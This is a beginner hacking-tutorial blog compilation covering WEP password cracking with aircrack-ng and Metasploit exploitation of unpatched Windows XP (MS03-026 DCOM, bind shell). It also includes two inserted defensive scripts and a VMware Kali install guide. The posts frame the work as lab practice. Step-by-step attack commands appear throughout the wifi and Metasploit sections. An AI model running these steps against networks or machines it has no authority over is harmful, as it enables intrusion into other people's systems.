PakTricks

Friday, 22 December 2017


Wifi Hacking - WEP - Kali Linux Aircrack-ng suite


Alright, this post is written assuming you have Kali Linux up and running on your computer. If not, here is a post on hacking with Kali Linux. It will tell you what Kali Linux is and how to use it, and it will guide you through the installation process.
So if you are still following, then just follow these simple steps:

Firstly, create a wireless network to crack. Don't use this method on others. It is illegal. Then proceed with the steps below.


1. Find out the name of your wireless adapter.


Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-

  • lo - loopback. Not important currently.
  • eth - ethernet
  • wlan - This is what we want. Note the suffix associated.
Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.




2. Enable Monitor mode

Now, we use a tool called airmon-ng to create a virtual interface called mon. Just type
airmon-ng start wlan0
Your monitoring interface will be created: mon0 in case of Kali 1.x, wlan0mon in all other cases.



3. Start capturing packets

Now, we'll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You'll see the name of the wifi you want to hack. For Kali 2.0 or rolling, replace mon0 with wlan0mon.
airodump-ng mon0


4. Store the captured packets in a file 

This can be achieved by giving some more parameters with the airodump command. For Kali 2.0 or rolling, replace mon0 with wlan0mon.
airodump-ng mon0 --write name_of_file

Now the captured packets will be stored in name_of_file-01.cap (airodump-ng appends a sequence number to the name you give it).

You will have to wait till you have enough data (10000 minimum).
PS: Don't wait too long for this step though. Just understand how the procedure works (including the next sections), and once you are convinced you know what you are doing, proceed to the next tutorial where we use ARP replay to speed up the rate at which we get packets. Using ARP request replay, we can get 10k packets in a few minutes.



5. Crack the wifi

If all goes well, then you'll be sitting in front of your PC, grinning, because you've finally got 10000 packets (don't stop the packet capture yet). Now, you can use aircrack-ng to crack the password (in a new terminal).
aircrack-ng name_of_file-01.cap
The program will ask which wifi to crack, if there are multiple available. Choose the wifi. It'll do its job. If the password is weak enough, then you'll get it in front of you. If not, the program will tell you to get more packets. The program will retry when there are 15000 packets, and so on.

You'll get the key, probably in this format-
xx:xx:xx:xx:xx
Remove the colons
xxxxxxxxxx is the password of the wireless network
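
From the defender's side, the files written in step 4 also show which access points in range still advertise WEP and should be moved to WPA2. As an added example (not from the original post), this script reads the CSV that airodump-ng writes next to the .cap file and lists every WEP access point; the sample rows, BSSIDs and network names are constructed.

```shell
#!/bin/sh
# Added example, not from the original post.
# Lists access points that still advertise WEP in an airodump-ng CSV
# (name_of_file-01.csv, written alongside name_of_file-01.cap).

# Constructed sample in the airodump-ng CSV layout: an access point table,
# a blank line, then a station table. All values are made up.
sample_csv() {
cat <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2017-12-22 10:00:01, 2017-12-22 10:05:00,  6,  54, WEP, WEP, , -40,      120,    10234,   0.  0.  0.  0,   7, lab-wep,
66:77:88:99:AA:BB, 2017-12-22 10:00:02, 2017-12-22 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,      118,       12,   0.  0.  0.  0,   8, lab-wpa2,
DE:AD:BE:EF:00:01, 2017-12-22 10:00:03, 2017-12-22 10:05:00,  1,  54, WEP, WEP, , -70,       60,        3,   0.  0.  0.  0,  11, old,printer,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
CC:DD:EE:FF:00:11, 2017-12-22 10:00:05, 2017-12-22 10:04:50, -38,      900, 00:11:22:33:44:55,
EOF
}

# find_wep: reads an airodump-ng CSV on stdin and prints one line per
# WEP access point as BSSID<TAB>channel<TAB>ESSID.
find_wep() {
  awk -F',' '
    function trim(s) { gsub(/^[ \t\r]+|[ \t\r]+$/, "", s); return s }
    # The station table follows the access point table: stop matching there.
    /^Station MAC/ { in_ap = 0 }
    # Column 6 is Privacy, column 14 is ESSID, the last column is Key.
    in_ap && NF >= 15 && trim($6) == "WEP" {
      essid = $14
      # An ESSID that contains commas spills into extra fields: rejoin them.
      for (i = 15; i < NF; i++) essid = essid "," $i
      printf "%s\t%s\t%s\n", trim($1), trim($4), trim(essid)
    }
    # Header of the access point table: rows after it are access points.
    /^BSSID/ { in_ap = 1 }
  '
}

# Use a real CSV if one is given as the first argument, else the sample.
if [ -r "${1:-}" ]; then
  find_wep < "$1"
else
  sample_csv | find_wep
fi
```

Run it against your own capture with the CSV path as the only argument.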

Issues?

Try this-
ifconfig wlan0 up
ifconfig wlan0 down
airmon-ng check kill
rfkill unblock all
Or this- (from Sebastian's comment below)

With the new version, the monitor is wlan0mon, and the monitor isn't working.
A solution is the commands:
ifconfig wlan0mon down
iwconfig wlan0mon mode monitor
ifconfig wlan0mon up

Source: http://stackoverflow.com/questions/32025472/airodump-ng-wlan0mon-doesnt-work

Disconnected from internet (wifi)?

Again, replace mon0 with wlan0mon for Kali 2.0 or rolling.
airmon-ng stop mon0
This is usually sufficient. If wlan0 is not up (check ifconfig or iwconfig), then do this (if you don't know what to do, then do this anyway)-
ifconfig wlan0 up
If wifi still doesn't start, try this too:
service network-manager restart

Want to try an easier method?

Use wifite, just one command required

For WPA/WPA-2

Hacking wpa/wpa-2 wps with reaver on kali linux

For Troubleshooting

The missing ingredient

This attack taking too long? Ready to go further?

Speed up WEP hacking with ARP replay attack

WPA hacking sucks? There's an alternate way to go about it

Hacking WPA/WPA-2 without dictionary/bruteforce : Fluxion


Hacking With Kali Linux

Tutorial on Hacking With Kali Linux




Why Kali Linux?

With Kali Linux, hacking becomes much easier since you have all the tools (more than 300 pre-installed tools) you are probably ever gonna need. Others can be downloaded easily. Now this tutorial will get you started and you'll be hacking with Kali Linux before you know it.





The problem with beginners

Now, I've been dealing with beginners for a long time (and was one myself for a long time too). What they want is magic. A tool which is easy to use, works on Windows, can be downloaded by searching on Google and clicking on the first link we see, and will do all the hacking itself at the push of a button. Sadly, no such tool exists (let's be real, would you use Facebook if a tool existed which you could install on Windows, simply type the person's username/mobile number/email and then just like that get his/her Facebook password?).

Hacking is an art, and it takes years of practice to master it. So how to get started? Having no idea about hacking is okay, but being a newbie with computers in general is not allowed. When I say beginner, I mean someone who has no experience with programming and with hacking methodologies. I didn't mean someone who needs a 1 page guide on how to download a tool. If you want to be a hacker, you have to work hard. So how to get started? If you have installed Kali Linux, 



Getting Started

Now, I am not boring you with theory (^ As if all this wasn't enough theory). My aim is to get you to the point where you can start hacking with Kali Linux as soon as possible. What I'm gonna do is tell you what to do. The process is rather simple :-







Things get tough now

If you have no previous experience with Linux and virtual machines and all that stuff, getting Kali Linux up and running won't be a piece of cake. You have 3 options:


1. Read the Kali official documentation

That will give you an idea about what a virtual machine is, how an OS can be run from USB, and how to create a partition and run 2 OS simultaneously. This is what I recommend. For that, go to Kali Official Documentation.

2. Read my modified version of Kali documentation

The second option is to look at these posts, which are just sparingly modified (and now outdated) versions of the Kali docs, and offer no advantage other than saving your time as their documentations cover much more than what the ones here do, and you don't really need to know all so much... yet. I'm linking them up here:

3. Utilize the zillions of tutorials on YouTube (New option)

At the time this guide was written (for the first time in 2013, then updated in 2014), Kali wasn't so popular. However, now there are plenty of websites dedicated to Kali Linux, and a lot of YouTube videos on how to install Kali. My installation guides are outdated (mine are for Kali 1.0, now even Kali 2.0 is outdated and Kali rolling is what most of you should be using). While you can use an old installation guide and make a few changes and have it work for you, it's better, especially if it's your first time installing an operating system alongside another, that you follow a guide tailored for your situation (e.g. if you are installing Kali rolling on Windows 10 on VirtualBox, then follow a guide for the exact same configuration, and not for Kali 2.0 on Windows 8 on VMware).
Installing an OS is serious business, don't take it lightly, and don't get discouraged if you fail at first. Also, backup your data if you're going for a dual boot.


Command Line Interface

Some bash commands
Now, if you are really sure about becoming a hacker, you have to get used to Linux, and specifically the command line interface. It is often compared (and rightly so) to the command prompt of Windows, but Linux's CLI is much more efficient and better than the command prompt. What you have to do is do all the usual tasks you do in Windows in the CLI of Linux. Use cd to navigate, poweroff to shutdown, etc.
A pretty awesome site for that is - http://linuxcommand.org/
Going through the complete site is on its own enough exercise to keep you occupied for a month, but you can proceed gradually. The first few tutorials here will keep in mind that you don't have much info about cli, and will be really beginner friendly.



    Some Useful Commands:

    If you don't plan on learning all of linux cli commands, here are a few that will keep your boat afloat.
    1. The default username and password is 'root' and 'toor'. 
    2. Type 'poweroff' in the terminal to shutdown. 
    3. apt-get command can be used to install tools and updates. 
    4. apt-get update and apt-get upgrade will update all the programs installed on your machine. 
    5. apt-get dist-upgrade will install the latest distribution of Kali (i.e. it upgrades your OS).

    PS: Tapping <tab> while typing makes Kali complete the word for you. Double tapping <tab> makes it display all possible words starting with the incomplete word. Ctrl+c stops the functioning of any tool that is running. Pressing the up arrow key shows the command you last typed.


    Some Real Hacking With Kali Linux

    Assuming you've gone through the above steps and are comfortable with your new hacking environment, it's time to do some real hacking with Kali Linux. My recommendation would be to start by hacking a wifi, then do some penetration testing, and maybe read something on Denial of Service when you have free time. Links here:

    Hack wireless networks in Kali Linux using aircrack

    Penetration Testing In Kali For Beginners

    Denial Of Service Attacks


    Penetration Testing - Hacking XP


    Our approach to penetration testing is going to be simple. I already made a post about the ideal way to begin penetration testing. But we aren't going the ideal way. I'm gonna teach you penetration testing the way I learnt it: by doing actual penetration and exploitation. We can't hack completely patched Windows 7 or Windows 8 right in the first tutorial, but we can definitely hack an unpatched Windows XP machine. However, to do that, you need a victim machine. Testing this method on someone else's computer is not recommended and is quite illegal. It is strongly advised to create your own virtual machine and test exploits there.

    What are you going to need

    Knowledge

    • Basic Penetration testing terms (I recommend that you take a look here, as I'm going to use the terms freely without any explanation here in this tutorial)
    • The tough manual way of penetration testing (A large patch of advanced material which will help you become a great pentester if you have the patience to read it all and capability to understand it)
    • VMWare tools (Without Vmware tools there is no way you can have a Kali linux (attacker machine) and unpatched XP (target machine) running at the same time in one single computer)

    Virtual Machines

    • Kali linux ( Click the link for a complete detailed guide)
    • Windows XP (After you've followed the tutorial above for installing Kali linux, installing XP on a VM will be a piece of cake, a few screenshots of the process)



    Now there is a catch with Windows XP. While Kali Linux is free, Windows XP is not. So you have to buy one (won't promote piracy here). Just make sure that when you are buying a Windows XP CD, it is unpatched and SP1. If it is patched then the exploits won't work. Your best bet would be to look through your shelves to find an old XP CD that you bought years ago which is catching dust, and put it to some use.

    A look at Metasploit Framework

    Starting the framework

    "In keeping with the Kali Linux Network Services Policy, there are no network services, including database services, running on boot so there are a couple of steps that need to be taken in order to get Metasploit up and running with database support." Simply speaking, there are some services that Metasploit needs which aren't started with system startup. So here are some commands you need to execute on your console before you can start Metasploit:
    service postgresql start
    (Metasploit uses PostgreSQL as its database so it needs to be launched first.)

    With PostgreSQL up and running, we next need to launch the metasploit service. The first time the service is launched, it will create a msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and Web servers it requires.
    service metasploit start
    Update: On recent versions of Kali, you can skip the above two commands, and start with the command below right away. If you are getting an error in the above commands, then just skip them.

    Now finally we are ready to start metasploit framework.
    msfconsole

    Looking at the targets

    Right now, my Metasploit framework is running on Kali on VMware on a Windows 8 machine. Also, there is a Windows XP SP3 virtual machine running side by side with my Kali. So what we need to do is detect these machines in Metasploit framework. For this we'll do a port scan.

    Port Scan

    Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. To use this feature, enter the following command:
    use auxiliary/scanner/portscan/tcp
    Type show options to see the available options
    show options
    Now we have to change a few settings. Firstly, we should reduce the number of ports scanned
    set ports 1-500
    Secondly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is not going to be the same in all cases. So here's what you'll do. Go to your XP virtual machine (the one you are trying to hack). Open command prompt and type
    ipconfig
    In the results, check the IP of the machine. This is what you'll have to set the RHOSTS option to.
    In my case the IP is 192.168.63.131
    Now go back to your Kali machine, and type the following (change the IP as required)
    set RHOSTS 192.168.63.131
    Here's what it should look like


    There's a slight error here, I spelled RHOSTS wrong. Make sure you add the 's' in the end.
    Now we are ready for some action, do a show options again to see what all changes you've made. Finally, type-
    run
    The scan will start and after some time it will show you which tcp ports are open and vulnerable to attack.
    If you are not using an unpatched version of Windows, there will not be any vulnerable ports.
    This basically means that there are no open ports here. Nothing much you can do. However, if you had some good luck there and had a vulnerable machine, you will have some vulnerable ports. In my case, I turned off the firewall on the Windows machine and ran the auxiliary module again.
    I got 3 open ports this time. If you are using some higher XP version, you too might need to disable the firewall in order to get open ports.
    Now we know we have a target at IP 192.168.63.131 and it has ports 135, 139 and 445 open.
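
The same exposure can be confirmed from the XP machine itself. As an added example (not from the original post), this script reads `netstat -an` output saved from the lab VM and reports which of the three ports found above are listening on an address other than loopback; the sample output is constructed.

```shell
#!/bin/sh
# Added example, not from the original post.
# Reads Windows "netstat -an" output and reports TCP listeners on ports
# 135, 139 and 445 that are bound to something other than 127.0.0.1,
# i.e. reachable from the network unless a firewall blocks them.

# Constructed sample: what netstat -an might print on the lab XP VM.
sample_netstat() {
cat <<'EOF'

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1028         0.0.0.0:0              LISTENING
  TCP    192.168.63.131:139     0.0.0.0:0              LISTENING
  TCP    192.168.63.131:1040    192.168.63.1:445       ESTABLISHED
  UDP    0.0.0.0:445            *:*
EOF
}

# exposed_listeners: reads netstat -an output on stdin and prints
# port<TAB>bind-address for each matching listener, sorted by port.
exposed_listeners() {
  awk '
    # Only TCP rows in the LISTENING state are listeners.
    $1 == "TCP" && $4 == "LISTENING" {
      n = split($2, part, ":")
      port = part[n]
      addr = substr($2, 1, length($2) - length(port) - 1)
      # Loopback-only listeners are not reachable from other hosts.
      if (addr == "127.0.0.1") next
      if (port == "135" || port == "139" || port == "445")
        print port "\t" addr
    }
  ' | sort -n
}

# Use a saved netstat file if one is given as the first argument,
# otherwise run on the constructed sample.
if [ -r "${1:-}" ]; then
  exposed_listeners < "$1"
else
  sample_netstat | exposed_listeners
fi
```

An empty result from a host means none of the three services is listening on a network-facing address.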


    Real life port scan

    In actual pentesting environment, you don't know about the IP, open ports and OS of the target computer. In such cases, we can use Nmap port scanner which is much better than auxiliary. We'll come to that later.

    Finding Exploits

    This step is important. We need to figure out which exploits work on the OS we are attacking. In our case, we already know what to do. Type back to get out of auxiliary scanner. Search for dcom on msfconsole.
    search dcom
    This is a very famous exploit for Windows.
    Copy the exploit number 3. (Which shows great as rank). In the next line, type
    use exploit/windows/dcerpc/ms03_026_dcom
    You are now using the most famous Windows exploit. Type show options again
    show options
    Again, set the RHOST as 192.168.63.131 (replace with the IP of your target)
    set RHOST 192.168.63.131 
    Also, set a payload.
    set PAYLOAD windows/shell_bind_tcp

    And here's the best part
    exploit

    You have now successfully broken into the target computer. You have an open shell on the target computer with administrator privileges. In short, you own that computer now. Try out what all you can do from here on. I'll come up with more in the next tutorial.
    Update - The next tutorial is here. It discusses the post exploitation fun that you can have with the meterpreter payload.  Post exploitation fun in an exploited xp machine
    We have a pentesting lab now and have successfully exploited an XP machine.

    Complete Detailed Guide on Installing Kali linux in Vmware



    This tutorial will walk you through the difficult process of installing Kali Linux in VMware Player, a free virtual machine manager that can be downloaded from www.vmware.com. This tutorial assumes that you have some basic knowledge of your computer (amount of RAM, number of processors, etc.). This tutorial is also intended for beginners who haven’t worked with VMware or Kali Linux before.





    Step One:

    First we need to download Kali from http://kali.org/downloads/.

    Step Two:
    Download via direct link or torrent.

    Step Three:
    When Kali has finished downloading, open VMware Player and click Create a new virtual machine.

    Step Four:
    In the window that opens, select Installer disc image file (iso) and browse to the location of and select the Kali Linux ISO file that you just downloaded.

    Once you have selected the file, click Next.
    Step Five:
    In the next step, select a name for the virtual machine. I’m going to name it Tutorial Kali for this tutorial. You also need to select a location for it, I recommend creating a folder called “Virtual machines” in My Documents. Then click Next.
    Step Six:
    Next step, you need to select a maximum size for Kali. I recommend doing at least 30 GB as Kali tends to expand over time. After you’ve entered your desired value (no less than 20 GB), change the next option to Store virtual disk as a single file and click Next.
    Step Seven:
    In the next window, we need to customize some hardware settings, so click on the Customize Hardware… button.
    Step Eight:
    You will now be presented with a Hardware window. Select Memory in the left pane of the window, and slide the slider on the right side to at least 512 MB*. This is for performance. Since I have 8 GB of RAM on my computer, I’m going to put it at 2 GB (2000 MB).
    *Note: you should give a virtual machine a maximum of half the RAM installed on your computer. If your computer has 4 GB of RAM, then the max you want to slide it to is 2 GB. If your computer has 8 GB, then you can go to a max of 4 GB, etc.

    Now highlight Processors in the left pane. This option really depends on your computer, if you have multiple processors, then you can select two or more. If you have a regular computer, with two or less, then I suggest leaving this number at one.

    Moving on, click on Network Adapter in the left pane. On the right side, move the dot to the Bridged (top) option. Now click on the Configure Adapters button.
    In the small window that pops up, uncheck all the boxes except for the one next to your regular network adapter and hit OK.
    You can now click on Close at the bottom of the Hardware window and then click on Finish in the Wizard.

    Step Nine
    After you click Finish the window will close and the new virtual machine file will be added to the VM library. Now all we have to do is start Kali and install it! To do this, highlight the name of the newly created virtual machine by clicking on it, and click Play virtual machine in the right pane.
    This will start Kali for the first time.
    Step 10:
    At the boot menu, use the arrow keys to scroll down to Graphical install and hit enter.
    Step 11:
    The next screen will ask you to select your preferred language, you can use the mouse to select this, then click Continue.
    Step 12:
    On the next screen, select your location and hit Continue.
    Step 13:
    It’ll now ask you for your standard keymap. If you use the standard American English keyboard, then just click Continue.
    Step 14:
    Wait until Kali finishes detecting the hardware on your computer. During this, you might be presented with this screen:
    Just hit Continue and select Do not configure the network at this time on the next screen.
    Step 15:
    You will now be asked to supply a hostname, which is kind of like a computer name. You can enter anything you want, or you can just leave it as kali. When you’re done, hit Continue.
    Step 16:
    Kali will now ask you to enter a password for the root (main) account. Make sure you can easily remember this password; if you forget it, you’ll have to reinstall Kali. Hit Continue after you’ve entered and re-entered the password of your choice.
    Step 17:
    The next step will ask you for your time zone, select it and click Continue.
    Step 18:
    Wait until Kali detects the disk partitions. When you are presented with the next step, select Guided – use entire disk (this is usually the top option), then click Continue.
    The installer will now confirm that you want to use this partition. Hit Continue.
    One more question about the partition will appear. Select the option that says All files in one partition and hit Continue.
    Step 19:
    Confirm that you want to make these changes by selecting Finish partitioning and write changes to disk. Then hit Continue.
    Step 20:
    The last question! Confirm that you really want to make these changes by moving the dot to Yes and hitting Continue for the last time.
    Kali will now start installing! Wait until it has completed, this might take upwards of 30 minutes.
    Step 21:
    Alright, Kali has finished installing and now you are presented with a window that asks you about a network mirror. You can just select No and hit Continue.
    Step 22:
    After a few minutes, the installer will ask you if you want to install the GRUB boot loader. Click Yes and Continue.
    Step 23:
    The installation should now complete, and you’ll be shown a notification message.
    Click Continue.
    Step 24:

    After it restarts, login to it with the user name root and the password that you created earlier. 